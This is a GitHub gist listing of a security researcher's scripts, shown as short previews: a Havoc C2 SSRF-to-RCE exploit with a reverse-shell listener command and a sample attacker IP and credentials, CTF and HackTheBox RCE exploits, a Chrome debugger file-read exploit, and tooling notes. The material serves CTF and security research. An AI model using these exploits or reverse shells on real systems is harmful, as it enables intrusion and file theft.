
LongCat pich4ya

@pich4ya
pich4ya / havoc_ssrf2rce.py
Last active January 21, 2025 15:49
The modified exploit code of SSRF (CVE-2024-41570) from @_chebuya and authN RCE from Laurence Tennant, Include Security
# Havoc C2 SSRF to AuthN RCE
# @author longcat (https://sth.sh)
#
# sudo ncat -lvp 443
# python havoc_ssrf2rce.py -t https://havoc.c2/ -l 1.3.3.7 --c2user 5pider --c2pass RKnnj5Vfq3bt9y7L
#
# The original authors are @_chebuya (SSRF) and Laurence Tennant, Include Security (AuthN RCE)
# Their writeups are great. I am so fascinated to read @_chebuya's blog post :)
# My work is just to integrate them into one single-shot exploit.
# In short, make WebSocket work with the Havoc C2 Agent Payload
@pich4ya
pich4ya / bookclub_exploit_rce.py
Last active December 29, 2024 07:42
Exploit for SEC Playground Bloody Xmas 2024 - Bookclub
#!/usr/bin/env python
# @author: longcat
# SEC Playground Bloody Xmas 2024 - Bookclub
# Exploit #2 - Read Flag w/ RCE (Reverse Shell)
import requests
import sys
import time
import argparse
import urllib3
@pich4ya
pich4ya / htb_clicker.py
Last active April 20, 2024 14:21
Exploit for HackTheBox Clicker Machine (https://app.hackthebox.com/machines/564)
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Exploit for HackTheBox Clicker Machine (https://app.hackthebox.com/machines/564)
import requests
import random
import string
import urllib.parse
from base64 import b64encode,b64decode
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
@pich4ya
pich4ya / bloodhound-python_issues.txt
Created April 16, 2024 05:13
Common solutions for Bloodhound-python errors, problems and issues
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Compiled list of my common bloodhound-python problems & solutions
Bloodhound-python Error #0
You do not get info like GPO and permission abuse edges.
You need to add option -> -c All,LoggedOn
Bloodhound-python Error #1
raise NoNameservers(request=self.request, errors=self.errors)
dns.resolver.NoNameservers: All nameservers failed to answer the query _ldap._tcp.pdc._msdcs.DCHOSTNAME. IN SRV: Server 10.3.3.7 TCP port 53 answered SERVFAIL
@pich4ya
pich4ya / brain_check.py
Last active January 23, 2024 16:02
brain_check.py
# A numeric lock has a 3 digit key
# "682" - One number is correct and well placed
# "614" - One number is correct but wrongly placed
# "206" - Two numbers are correct but wrongly placed
# "738" - Nothing is correct
# "780" - One number is correct but wrongly placed
from z3 import *
# Create three integer variables for the lock digits
@pich4ya
pich4ya / apk_getString_R_string.py
Last active January 19, 2025 15:28
This script can be used to replace strings.xml values in a target Java file
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# I tried all jadx options for deobf, but it did not work.
# This script can be used to replace strings.xml values in a target Java file
# if (!Intrinsics.areEqual(param, context.getString(R.string.m1))) { -> if (!Intrinsics.areEqual(param, "monday")) {
# Prompted and modified with ChatGPT for FlareOn 10's ItsOnFire
# Usage: python apk_getString_R_string.py resources/res/values/strings.xml sources/com/secure/itsonfire/MessageWorker.java
# Usage: python apk_getString_R_string.py resources/res/values/strings.xml sources
import xml.etree.ElementTree as ET
import re
import sys
@pich4ya
pich4ya / vultr_nuke.sh
Created July 7, 2023 11:47
Spawn a Vultr VPS instance with zsh script
#!/usr/bin/env zsh
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Ansible's Vultr module sucks. I have built my own.
# Nuke all my Vultr instances
ssh_key=$(cat ~/.ssh/id_ed25519_vultr.pub)
echo "$ssh_key"
# List Instances
curl "https://api.vultr.com/v2/instances" \
-X GET \
@pich4ya
pich4ya / lookingglass_ssh.txt
Created March 17, 2023 15:34
TryHackMe "Looking Glass" - Find the right port with binary search
#!/bin/zsh
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# https://tryhackme.com/room/lookingglass
# 10.10.169.23
function ssh_connect {
ssh root@10.10.169.23 -p "$1" 2>/dev/null | grep -q 'Higher' && echo "Higher" && exit 0
echo "Lower"
}
@pich4ya
pich4ya / weedshop_exploit.py
Last active July 3, 2023 07:12
Weed Shop RCE Exploit
#!/usr/bin/env python
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# 2023-03-07
# Weed Shop RCE Exploit
import requests
def create_dbfile(filename):
# Vulnerability 1: IP Spoofing
# File: function.php
@pich4ya
pich4ya / chrome_remote_debug_lfi.py
Created March 6, 2023 11:49
Chrome Debugger Local File Inclusion (No CVE; a security misconfiguration if the port is accessible to the attacker)
#!/usr/bin/env python
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Ported from https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/chrome_debugger.rb
# pip install requests websocket-client python-socks
# This exploit code can be used to read arbitrary files on the victim machine with
# chrome/chromium --remote-debugging-port=9222, which usually runs as a test automation tool during software testing
import requests
import json
import urllib3
import websocket